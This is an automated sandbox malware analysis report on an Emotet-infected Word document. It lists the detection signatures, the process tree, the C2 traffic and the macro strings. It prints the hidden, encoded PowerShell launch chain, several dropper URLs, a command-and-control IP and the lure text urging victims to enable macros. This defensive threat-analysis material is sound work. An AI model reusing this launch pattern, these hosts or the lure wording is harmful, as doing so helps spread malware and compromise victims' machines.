Analysis Report Bestand.doc

Overview

General Information

Sample Name: Bestand.doc
Analysis ID: 337085
MD5: 64553aae596a4b3177964c3bac7502eb
SHA1: 9cdaf9d3f8dc72d15055fb5ca20fc0dd79b438ff
SHA256: 05ec62e5c17cce0faee1f6e791180a7104de6a277f0a3981a65ad43286b5854f

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
Creates processes via WMI
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with base64 encoded strings
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Obfuscated command line found
Potential dropper URLs found in powershell memory
PowerShell case anomaly found
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2452 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • cmd.exe (PID: 1976 cmdline: cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD 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 MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
    • msg.exe (PID: 2624 cmdline: msg user /v Word experienced an error trying to open the file. MD5: 2214979661E779C3E3C33D4F14E6F3AC)
    • powershell.exe (PID: 2544 cmdline: POwersheLL -w hidden -ENCOD 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 MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • rundll32.exe (PID: 1616 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lqpw_5i\F4w0osc\R95F.dll Control_RunDLL MD5: DD81D91FF3B0763C392422865C9AC12E)
        • rundll32.exe (PID: 2892 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lqpw_5i\F4w0osc\R95F.dll Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
          • rundll32.exe (PID: 2808 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pqryhcbuipyk\timgojzfiiv.pkf',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
            • rundll32.exe (PID: 2884 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Smbjrydierlk\vhfvfjykmpc.gpr',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 960 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zighjhitzytphbn\uglqlahctjehdp.dot',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 2440 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kviedw\vklxa.red',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 2352 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jwivvemqsvj\ytoymdqmxu.lfx',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                    • rundll32.exe (PID: 2800 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xjfxyzhrduzjhpv\whfytnwxpdgksj.gxy',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                      • rundll32.exe (PID: 3004 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yvmidjdy\junkzqh.mrj',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                        • rundll32.exe (PID: 2952 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Keqofngu\zdyvzfg.cjv',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                          • rundll32.exe (PID: 2252 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ngtbqtsge\bgcbpmtq.wzo',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                            • rundll32.exe (PID: 1604 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Loyvqvaohpqmmxv\wleeyowrrvrssq.giw',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                              • rundll32.exe (PID: 2204 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Rqvte\amll.nuu',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                                • rundll32.exe (PID: 2536 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gpjmjgasqrjuply\qjwbjnwqtblulz.cqq',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source                                                                Rule                Description           Author        Strings
0000000D.00000002.2103170019.0000000000221000.00000020.00000001.sdmp  JoeSecurity_Emotet  Yara detected Emotet  Joe Security
00000013.00000002.2341899738.00000000006F1000.00000020.00000001.sdmp  JoeSecurity_Emotet  Yara detected Emotet  Joe Security
00000012.00000002.2110963948.00000000001F0000.00000040.00000001.sdmp  JoeSecurity_Emotet  Yara detected Emotet  Joe Security
0000000A.00000002.2099512002.0000000000230000.00000040.00000001.sdmp  JoeSecurity_Emotet  Yara detected Emotet  Joe Security
00000010.00000002.2106608092.00000000001B0000.00000040.00000001.sdmp  JoeSecurity_Emotet  Yara detected Emotet  Joe Security

Unpacked PEs

Source                                 Rule                Description           Author        Strings
10.2.rundll32.exe.250000.1.unpack      JoeSecurity_Emotet  Yara detected Emotet  Joe Security
18.2.rundll32.exe.1f0000.0.unpack      JoeSecurity_Emotet  Yara detected Emotet  Joe Security
18.2.rundll32.exe.1f0000.0.raw.unpack  JoeSecurity_Emotet  Yara detected Emotet  Joe Security
16.2.rundll32.exe.1d0000.1.unpack      JoeSecurity_Emotet  Yara detected Emotet  Joe Security
12.2.rundll32.exe.2c0000.1.unpack      JoeSecurity_Emotet  Yara detected Emotet  Joe Security

Sigma Overview

System Summary:

Sigma detected: Suspicious Encoded PowerShell Command Line
Source: Process started, Author: Florian Roth, Markus Neis: Data: Command: POwersheLL -w hidden -ENCOD [...]

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: https://brettshawmagic.com/content/Y/ Avira URL Cloud: Label: malware
Source: http://hangarlastik.com/cgi-bin/Ui4n/ Avira URL Cloud: Label: malware
Source: https://cafecentral.vincoorbisdev.com/wp-admin/VZX9BU/ Avira URL Cloud: Label: malware
Source: http://sarture.com/wp-includes/JD8/ Avira URL Cloud: Label: malware
Source: http://seo.udaipurkart.com/rx-5700-6hnr7/Sgms/ Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: hangarlastik.com Virustotal: Detection: 6%
Source: seo.udaipurkart.com Virustotal: Detection: 6%
Multi AV Scanner detection for submitted file
Source: Bestand.doc Virustotal: Detection: 61%
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100011C0 Control_RunDLL,VirtualAlloc,VirtualAlloc,GetModuleHandleExA,VirtualAlloc,GetProcAddress,GetProcAddress,VirtualAlloc,GetProcAddress,LdrFindResource_U,LdrAccessResource,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDeriveKey,VirtualAlloc,_memmove,CryptEncrypt,7_2_100011C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100021F0 CryptStringToBinaryW,CoTaskMemAlloc,CryptStringToBinaryW,StgDeserializePropVariant,CoTaskMemFree,7_2_100021F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10002730 StgSerializePropVariant,CryptBinaryToStringW,CoTaskMemAlloc,CryptBinaryToStringW,CoTaskMemFree,CoTaskMemFree,7_2_10002730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_006F75AE CryptDecodeObjectEx,19_2_006F75AE
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: E:\WindowsSDK7-Samples-master\WindowsSDK7-Samples-master\winui\shell\appshellintegration\RecipePropertyHandler\Win32\Release\RecipePropertyHandler.pdb source: rundll32.exe, 00000007.00000002.2097438801.000000001000D000.00000002.00020000.sdmp
Source: Binary string: ws\System.pdbpdbtem.pdb\B source: powershell.exe, 00000005.00000002.2095066862.0000000002C37000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.pdbE source: powershell.exe, 00000005.00000002.2095066862.0000000002C37000.00000004.00000040.sdmp
Source: Binary string: ws\dll\System.pdb source: powershell.exe, 00000005.00000002.2095066862.0000000002C37000.00000004.00000040.sdmp
Source: Binary string: <ystem.pdbD source: powershell.exe, 00000005.00000002.2095066862.0000000002C37000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.pdblogwW source: powershell.exe, 00000005.00000002.2095066862.0000000002C37000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbrac source: powershell.exe, 00000005.00000002.2095066862.0000000002C37000.00000004.00000040.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.2095066862.0000000002C37000.00000004.00000040.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2095066862.0000000002C37000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2094801534.0000000002780000.00000002.00000001.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_006F109C FindFirstFileW,19_2_006F109C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: global traffic DNS query: name: hangarlastik.com
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 89.252.164.58:80

Networking:

Potential dropper URLs found in powershell memory
Source: powershell.exe, 00000005.00000002.2097223327.0000000003784000.00000004.00000001.sdmp String found in memory: http://hangarlastik.com/cgi-bin/Ui4n/
Source: powershell.exe, 00000005.00000002.2097223327.0000000003784000.00000004.00000001.sdmp String found in memory: http://padreescapes.com/blog/0I/
Source: powershell.exe, 00000005.00000002.2097223327.0000000003784000.00000004.00000001.sdmp String found in memory: http://sarture.com/wp-includes/JD8/
Source: powershell.exe, 00000005.00000002.2097223327.0000000003784000.00000004.00000001.sdmp String found in memory: http://seo.udaipurkart.com/rx-5700-6hnr7/Sgms/
Source: powershell.exe, 00000005.00000002.2097223327.0000000003784000.00000004.00000001.sdmp String found in memory: http://phuongapple.com/messenger-sound-8kwkq/YFr7/
Source: powershell.exe, 00000005.00000002.2097223327.0000000003784000.00000004.00000001.sdmp String found in memory: https://brettshawmagic.com/content/Y/
Source: powershell.exe, 00000005.00000002.2097223327.0000000003784000.00000004.00000001.sdmp String found in memory: https://cafecentral.vincoorbisdev.com/wp-admin/VZX9BU/
Source: global traffic HTTP traffic detected: GET /cgi-bin/Ui4n/ HTTP/1.1 Host: hangarlastik.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1 Host: hangarlastik.com
Source: global traffic HTTP traffic detected: GET /blog/0I/ HTTP/1.1 Host: padreescapes.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-includes/JD8/ HTTP/1.1 Host: sarture.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /rx-5700-6hnr7/Sgms/ HTTP/1.1 Host: seo.udaipurkart.com Connection: Keep-Alive
Source: Joe Sandbox View IP Address: 5.2.136.90
Source: Joe Sandbox View ASN Name: NETINTERNETNetinternetBilisimTeknolojileriASTR
Source: Joe Sandbox View ASN Name: LINODE-APLinodeLLCUS
Source: Joe Sandbox View ASN Name: RCS-RDS73-75DrStaicoviciRO
Source: Joe Sandbox View ASN Name: ZINIOSS-AS-INZiniosInformationTechnologyPvtLtdIN
Source: global traffic HTTP traffic detected: POST /1b05ye92bd1jr3/zyv623ztls/15s4sj3gl56q/ HTTP/1.1 DNT: 0 Referer: 5.2.136.90/1b05ye92bd1jr3/zyv623ztls/15s4sj3gl56q/ Content-Type: multipart/form-data; boundary=------------------kE9SOewkKUR6zpUliE User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 5.2.136.90 Content-Length: 6772 Connection: Keep-Alive Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_0070023A InternetReadFile,19_2_0070023A
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9B0EF2ED-537D-406E-B057-1B1541B1D39D}.tmp
Source: rundll32.exe, 00000006.00000002.2097659737.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095270294.0000000001E80000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097228304.0000000002020000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2099371824.0000000001E80000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.2104055243.0000000002010000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown DNS traffic detected: queries for: hangarlastik.com
Source: unknown HTTP traffic detected: POST /1b05ye92bd1jr3/zyv623ztls/15s4sj3gl56q/ HTTP/1.1 DNT: 0 Referer: 5.2.136.90/1b05ye92bd1jr3/zyv623ztls/15s4sj3gl56q/ Content-Type: multipart/form-data; boundary=------------------kE9SOewkKUR6zpUliE User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 5.2.136.90 Content-Length: 6772 Connection: Keep-Alive Cache-Control: no-cache

                      E-Banking Fraud:

                      barindex
                      Yara detected EmotetShow sources

                      System Summary:

                      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
                      Source: Screenshot number: 4, Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 'age' ' 0' ' i Wo'd
                      Source: Screenshot number: 4, Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available for protected documents. You have to press "E
                      Source: Screenshot number: 4, Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Screenshot number: 4, Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 'age' ' 0' ' i Wo'd"' i C i N@m 13 ;a 10
                      Source: Screenshot number: 8, Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. O a S
                      Source: Screenshot number: 8, Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                      Source: Screenshot number: 8, Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Screenshot number: 8, Screenshot OCR: ENABLE CONTENT" buttons to preview this document. O a S
                      Source: Document image extraction number: 0, Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                      Source: Document image extraction number: 0, Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Document image extraction number: 0, Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                      Source: Document image extraction number: 1, Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                      Source: Document image extraction number: 1, Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                      Source: Document image extraction number: 1, Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Document image extraction number: 1, Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                      Document contains an embedded VBA macro with suspicious strings
                      Source: VBA code instrumentation, OLE, VBA macro: Module A81c_pcot0t3c8, Function Rvpv59xrvp7m2wb, String createtextfile: Set eRxrHHEBB = TptSCH.CreateTextFile("MqoMRwwIg:\gqqsLDE\cFTTPq.jfZyU"), Name: Rvpv59xrvp7m2wb
                      Source: VBA code instrumentation, OLE, VBA macro: Module A81c_pcot0t3c8, Function Rvpv59xrvp7m2wb, String createtextfile: Set UaCEJEERD = bwdNxC.CreateTextFile("tNUBI:\bUxfKyODA\ZyrvC.WCgQpU"), Name: Rvpv59xrvp7m2wb
                      Source: VBA code instrumentation, OLE, VBA macro: Module A81c_pcot0t3c8, Function Rvpv59xrvp7m2wb, String createtextfile: Set uwCSCCEO = KTDSIL.CreateTextFile("VdGtFIE:\SzlumIC\CndNBJiEG.WAxLRDDC"), Name: Rvpv59xrvp7m2wb
                      Source: VBA code instrumentation, OLE, VBA macro: Module A81c_pcot0t3c8, Function Rvpv59xrvp7m2wb, String createtextfile: Set NHymnJzG = TiWkS.CreateTextFile("JhEjHJH:\heHcF\xIjwBCI.IWEODGR"), Name: Rvpv59xrvp7m2wb
                      Source: VBA code instrumentation, OLE, VBA macro: Module A81c_pcot0t3c8, Function Rvpv59xrvp7m2wb, String createtextfile: Set rfIxFdkBE = ZZzrG.CreateTextFile("HrrfJtDR:\BPgVNA\eowWDqCnB.iaEjRFDB"), Name: Rvpv59xrvp7m2wb
                      Source: VBA code instrumentation, OLE, VBA macro: Module A81c_pcot0t3c8, Function Rvpv59xrvp7m2wb, String createtextfile: Set bcUFD = zetDIDBDI.CreateTextFile("ayAqsH:\opXXFq\UykoCNloH.lEEiEJlG"), Name: Rvpv59xrvp7m2wb
                      Source: VBA code instrumentation, OLE, VBA macro: Module A81c_pcot0t3c8, Function Rvpv59xrvp7m2wb, String createtextfile: Set TOXmCsgb = TjDNNFkVD.CreateTextFile("JYXoyLAMu:\EFBhEtGsQ\owfrHBHf.anGOrJLhY"), Name: Rvpv59xrvp7m2wb
                      Source: VBA code instrumentation, OLE, VBA macro: Module A81c_pcot0t3c8, Function Rvpv59xrvp7m2wb, String createtextfile: Set yHxgEeJg = AUZLIjCLH.CreateTextFile("LPJPJFI:\CTzVF\dLRZEH.maUZE"), Name: Rvpv59xrvp7m2wb
                      Source: VBA code instrumentation, OLE, VBA macro: Module A81c_pcot0t3c8, Function Rvpv59xrvp7m2wb, String createtextfile: Set ApdWADYGV = UjlQFBJj.CreateTextFile("zGzGFMUJD:\QkpIYHOrc\FwQpsJ.ddKnHUJB"), Name: Rvpv59xrvp7m2wb
                      Source: VBA code instrumentation, OLE, VBA macro: Module A81c_pcot0t3c8, Function Rvpv59xrvp7m2wb, String createtextfile: Set eLNGd = buKzFt.CreateTextFile("sucQc:\iYsaHyNC\NiIqHAH.mTesbI"), Name: Rvpv59xrvp7m2wb
                      Source: VBA code instrumentation, OLE, VBA macro: Module A81c_pcot0t3c8, Function Rvpv59xrvp7m2wb, String createtextfile: Set hQCyFzF = msoKFIIMI.CreateTextFile("SQhZmTV:\ITZNAskG\hSsqo.sNJcmiGF"), Name: Rvpv59xrvp7m2wb
                      Source: VBA code instrumentation, OLE, VBA macro: Module A81c_pcot0t3c8, Function Rvpv59xrvp7m2wb, String createtextfile: Set sPUjHbDB = FijxC.CreateTextFile("DNCEiIDxC:\EYevg\MFdKF.RmyPCLa"), Name: Rvpv59xrvp7m2wb
                      Source: VBA code instrumentation, OLE, VBA macro: Module A81c_pcot0t3c8, Function Slz39ct0lz_ksnd, String createtextfile: Set fdLCFDmF = WqyIx.CreateTextFile("ylDMcFB:\AAOOMAKJq\xwBWuI.IOYsGSuDB"), Name: Slz39ct0lz_ksnd
                      Source: VBA code instrumentation, OLE, VBA macro: Module A81c_pcot0t3c8, Function Slz39ct0lz_ksnd, String createtextfile: Set tfgmN = tNvqYU.CreateTextFile("sGEGIHLHI:\qsyPj\EiYLgCIK.EdPNHU"), Name: Slz39ct0lz_ksnd
                      Source: VBA code instrumentation, OLE, VBA macro: Module A81c_pcot0t3c8, Function Slz39ct0lz_ksnd, String createtextfile: Set JJetH = MeLoxDCJT.CreateTextFile("VixyO:\QYvZJLAY\DkDtKB.ACnqoxJ"), Name: Slz39ct0lz_ksnd
                      Source: VBA code instrumentation, OLE, VBA macro: Module A81c_pcot0t3c8, Function Slz39ct0lz_ksnd, String createtextfile: Set hgvZG = TmGkDL.CreateTextFile("LhykJB:\jTdNFUJ\PnxpBEA.YspSlC"), Name: Slz39ct0lz_ksnd
                      Source: VBA code instrumentation, OLE, VBA macro: Module A81c_pcot0t3c8, Function Zacj6cs0xxmkchq, String createtextfile: Set RJCEFJhC = WcDDCTDnI.CreateTextFile("MRDYFoGGc:\LGsvZeCE\WxUJACHB.KjAkiD"), Name: Zacj6cs0xxmkchq
                      Source: VBA code instrumentation, OLE, VBA macro: Module A81c_pcot0t3c8, Function Zacj6cs0xxmkchq, String createtextfile: Set ZYnQf = GUUgA.CreateTextFile("gDyoIzGDe:\zHPnE\SlHrCGBaB.xpVdXbCuJ"), Name: Zacj6cs0xxmkchq
                      Document contains an embedded VBA with base64 encoded strings
                      Source: VBA code instrumentation, OLE, VBA macro: Module A81c_pcot0t3c8, Function Rvpv59xrvp7m2wb, String HNkPCvHSVKIC
                      Source: VBA code instrumentation, OLE, VBA macro: Module A81c_pcot0t3c8, Function Rvpv59xrvp7m2wb, String LhUxJGiLUCZp
                      Source: VBA code instrumentation, OLE, VBA macro: Module A81c_pcot0t3c8, Function Rvpv59xrvp7m2wb, String QkKSDHgSXaAA
                      Source: VBA code instrumentation, OLE, VBA macro: Module A81c_pcot0t3c8, Function Rvpv59xrvp7m2wb, String zDOlFEIFBVWkPbIC
                      Source: VBA code instrumentation, OLE, VBA macro: Module A81c_pcot0t3c8, Function Rvpv59xrvp7m2wb, String xfhECJccxFyA
                      Source: VBA code instrumentation, OLE, VBA macro: Module A81c_pcot0t3c8, Function Rvpv59xrvp7m2wb, String wOTiEDqNZtWN
                      Source: VBA code instrumentation, OLE, VBA macro: Module A81c_pcot0t3c8, Function Rvpv59xrvp7m2wb, String xaOQJbzFVCXtJADD
                      Source: VBA code instrumentation, OLE, VBA macro: Module A81c_pcot0t3c8, Function Rvpv59xrvp7m2wb, String YfIwYFFntmmdDsPv
                      Source: VBA code instrumentation, OLE, VBA macro: Module A81c_pcot0t3c8, Function Rvpv59xrvp7m2wb, String nbBVBbrmTJhR
                      Source: VBA code instrumentation, OLE, VBA macro: Module A81c_pcot0t3c8, Function Rvpv59xrvp7m2wb, String JNHUAINVrwxEKEHD
                      Source: VBA code instrumentation, OLE, VBA macro: Module A81c_pcot0t3c8, Function Slz39ct0lz_ksnd, String WVtJEvzwejAL
                      Source: VBA code instrumentation, OLE, VBA macro: Module A81c_pcot0t3c8, Function Slz39ct0lz_ksnd, String YIyOHHHeDXloKIBE
                      Source: VBA code instrumentation, OLE, VBA macro: Module A81c_pcot0t3c8, Function Zacj6cs0xxmkchq, String UqiKuFLuUFAG
                      Very long command line found
                      Source: unknown, Process created: Commandline size = 5629
                      Source: unknown, Process created: Commandline size = 5533
                      Source: C:\Windows\System32\cmd.exe, Process created: Commandline size = 5533
                      Source: C:\Windows\SysWOW64\rundll32.exe, Memory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exe, Memory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exe, File created: C:\Windows\SysWOW64\Pqryhcbuipyk\
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00235D1D8_2_00235D1D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00238D1C8_2_00238D1C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022C7698_2_0022C769
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00230B688_2_00230B68
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002317738_2_00231773
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022E3778_2_0022E377
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00228F788_2_00228F78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00225B798_2_00225B79
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00239B458_2_00239B45
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002323498_2_00232349
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00238F498_2_00238F49
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002267548_2_00226754
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022B75F8_2_0022B75F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002269A08_2_002269A0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002217AC8_2_002217AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002373AC8_2_002373AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00236DB98_2_00236DB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002361B88_2_002361B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002395868_2_00239586
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023878F8_2_0023878F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022F98C8_2_0022F98C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002279988_2_00227998
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00226D9F8_2_00226D9F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022839D8_2_0022839D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002331E28_2_002331E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00233FE78_2_00233FE7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022D7EB8_2_0022D7EB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002367E98_2_002367E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002371EF8_2_002371EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00231BDF8_2_00231BDF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00229FDC8_2_00229FDC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007AEE789_2_007AEE78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007A2C639_2_007A2C63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007AB41F9_2_007AB41F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007B42DA9_2_007B42DA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007B02C39_2_007B02C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007AC0C69_2_007AC0C6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007B38959_2_007B3895
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007A568E9_2_007A568E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007A7B639_2_007A7B63
